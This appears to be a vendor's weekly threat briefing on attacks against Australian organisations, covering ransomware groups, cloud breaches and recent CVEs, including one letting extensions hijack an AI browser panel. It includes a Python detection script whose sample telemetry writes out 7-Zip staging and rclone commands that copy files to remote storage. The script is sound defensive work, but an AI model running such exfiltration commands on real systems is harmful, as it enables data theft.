As a senior penetration tester actively analysing adversary behaviour and responding to frontline incidents, I am tracking a highly volatile threat landscape across Australia. Over the past seven days leading up to 22 March 2026, the window between vulnerability disclosure and active exploitation has collapsed to mere days. A recent industry survey reveals that "cyber breach fatigue" is setting in among the Australian public, while 70% of local organisations report being impacted by AI-led attacks over the last year. Adversaries are aggressively weaponising artificial intelligence, exploiting cloud misconfigurations, and capitalising on critical zero-day vulnerabilities in web applications and APIs.
Here is your weekly threat briefing detailing the active exploits, prominent threat actors, and critical vulnerabilities impacting Australian organisations across key sectors.
Sector Threat Analysis
Healthcare
The healthcare sector remains under intense siege from double-extortion ransomware. A joint advisory from the Australian Cyber Security Centre (ACSC) warned of the INC Ransom group breaching over 11 Australian organisations. Affiliates operating this Ransomware-as-a-Service (RaaS) are using legitimate administrative tools like 7-Zip and rclone to blend into normal network traffic and bypass basic defences. Concurrently, the SafePay ransomware gang recently targeted an Australian orthodontics provider, publishing staff details and patient payment plans to the dark web to force extortion payments.
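The living-off-the-land pattern described above (7-Zip to stage data, rclone to push it out) is detectable from ordinary process-creation telemetry. The following script is an added example written for this briefing; it is not code from the ACSC advisory or from any vendor. It runs over a handful of constructed process-creation records (the field layout, hostnames, paths, the 30-minute correlation window and the "expected install path" baseline are all assumptions) and raises an alert when an archive is created and an rclone transfer to a remote follows on the same host.

```python
"""Correlate 7-Zip archive creation with rclone outbound transfers.

Added defender-side example (not from the briefing or ACSC advisory).
Input records are constructed and loosely modelled on process-creation
events; fields, paths, hosts and thresholds are illustrative assumptions.
"""
import re
from datetime import datetime, timedelta

# Constructed sample telemetry: (timestamp, host, user, image path, command line).
SAMPLE_EVENTS = [
    ("2026-03-18T02:11:04", "FS01", "svc_backup", r"C:\Program Files\7-Zip\7z.exe",
     r"7z.exe a -p -mhe=on \\FS01\staging\pat.7z D:\Shares\Patients"),
    ("2026-03-18T02:19:40", "FS01", "svc_backup", r"C:\Users\Public\rclone.exe",
     r"rclone.exe copy \\FS01\staging remote:dump --transfers 16"),
    ("2026-03-18T09:30:00", "WS22", "jsmith", r"C:\Program Files\7-Zip\7z.exe",
     r"7z.exe x report.zip"),
    ("2026-03-19T23:02:11", "DC02", "admin", r"C:\Windows\Temp\rclone.exe",
     r"rclone.exe sync C:\Exports mega:share"),
]

ARCHIVER = re.compile(r"(?:^|\\)7z(?:a|g)?\.exe$", re.IGNORECASE)
SYNC_TOOL = re.compile(r"(?:^|\\)rclone\.exe$", re.IGNORECASE)
ARCHIVE_CREATE = re.compile(r"\b7z\S*\s+a\b", re.IGNORECASE)        # 7-Zip "a" = add/create
PASSWORD_FLAG = re.compile(r"\s-p\S*(?=\s|$)")                        # 7-Zip -p[password]
# rclone data-moving subcommand followed by a "remote:" token (not a drive letter like C:\).
OUTBOUND_SYNC = re.compile(r"\b(copy|sync|move)\b.*\b[\w-]+:(?!\\)", re.IGNORECASE)
# Assumed baseline: where these tools are legitimately installed in this environment.
EXPECTED_PATHS = {r"C:\Program Files\7-Zip", r"C:\Program Files\rclone"}
WINDOW = timedelta(minutes=30)  # assumed staging-to-exfil correlation window


def classify(event):
    """Return the list of suspicious traits found on a single process record."""
    _ts, _host, _user, image, cmdline = event
    flags = []
    if ARCHIVER.search(image) and ARCHIVE_CREATE.search(cmdline):
        flags.append("archive_create")
        if PASSWORD_FLAG.search(cmdline):
            flags.append("password_protected")   # common in extortion staging
    if SYNC_TOOL.search(image) and OUTBOUND_SYNC.search(cmdline):
        flags.append("outbound_sync")
    tool = ARCHIVER.search(image) or SYNC_TOOL.search(image)
    if tool and not any(image.startswith(p) for p in EXPECTED_PATHS):
        flags.append("unexpected_path")          # tool dropped outside its install dir
    return flags


def detect(events, window=WINDOW):
    """Emit one alert per outbound rclone transfer; escalate if preceded by archiving."""
    parsed = [(datetime.fromisoformat(e[0]), e, classify(e)) for e in events]
    alerts = []
    for ts, ev, flags in parsed:
        if "outbound_sync" not in flags:
            continue
        host = ev[1]
        staged = [p for p in parsed
                  if "archive_create" in p[2] and p[1][1] == host
                  and timedelta(0) <= ts - p[0] <= window]
        merged = set(flags)
        for p in staged:
            merged.update(p[2])
        alerts.append({
            "host": host,
            "user": ev[2],
            "time": ev[0],
            "severity": "high" if staged else "medium",
            "flags": sorted(merged),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The escalation logic is the point: rclone alone is noisy in environments that use it for backups, and 7-Zip alone is everywhere, but an archive created with `-p` followed within minutes by an rclone push to a remote from an unexpected path is the sequence worth paging on. Tune `EXPECTED_PATHS` and `WINDOW` to your own baseline before deploying anything like this.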
SaaS Providers & Government
Supply chain and cloud vulnerabilities took centre stage following a major data breach involving a global legal intelligence SaaS provider. A threat actor tracked as 'FulcrumSec' breached the provider's AWS cloud environment by exploiting "React2Shell", a critical vulnerability in an unpatched web application. This supply chain attack exposed highly sensitive data belonging to Australian law firms and federal government agencies. Furthermore, recent audits have revealed severe Microsoft 365 cloud misconfigurations within state government departments, including a critical lack of Data Loss Prevention (DLP) controls.
eCommerce
Digital retail and physical supply chains are facing cascading disruptions. Attackers recently leaked data stolen from major Australian poultry processor Hazeldenes, while the Kairos ransomware group disrupted consumer-facing commerce by breaching the Seagrass Boutique Hospitality Group. Exploited web application vulnerabilities and poorly secured APIs remain the primary initial access vectors for these financially motivated threat actors.
FinTech
Proactive cyber resilience is now a strictly enforced regulatory expectation in Australia. This week, ASIC imposed a landmark AUD 2.5 million penalty on FIIG Securities for historical cybersecurity governance failures. With established threat groups like Akira and Qilin accounting for 45% of recent ransomware incidents, FinTech organisations must urgently secure their cloud infrastructure and financial APIs to defend against sophisticated extortion and comply with the mandatory reporting requirements of the Cyber Security Act.
Education / EdTech
Higher education institutions and EdTech platforms are actively being targeted via CVE-2026-1731, a critical pre-authentication Remote Code Execution (RCE) vulnerability in BeyondTrust remote support software. Threat actors are exploiting this flaw to bypass perimeter defences and establish persistent footholds within self-hosted educational environments.
IoT
The ACSC and the Five Eyes intelligence alliance issued an emergency directive regarding CVE-2026-20127, a maximum-severity (CVSS 10.0) authentication bypass vulnerability in Cisco Catalyst SD-WAN products. Actively exploited by a sophisticated threat actor dubbed UAT-8616, this flaw allows attackers to gain administrative privileges, create rogue local accounts, and establish persistent access across distributed IoT networks and critical edge-facing infrastructure.
AI Systems
We are seeing the real-world impact of AI vulnerabilities expanding the attack surface. Researchers recently uncovered CVE-2026-0628, a high-severity security flaw in Google Chrome's implementation of its Gemini AI feature. This vulnerability allowed malicious extensions to hijack the AI panel, tap into the browser environment, and access local operating system files. This highlights the urgent need to apply strict identity, privilege, and monitoring disciplines to AI-integrated systems.
Conclusion
The current threat landscape demands a paradigm shift. Traditional, reactive security approaches are obsolete against adversaries operating at machine speed. Australian organisations must urgently prioritise proactive exposure management, rigorous API testing, and continuous cloud security posture monitoring to build true resilience.
Contact us for a quote for penetration testing services or adversary simulation.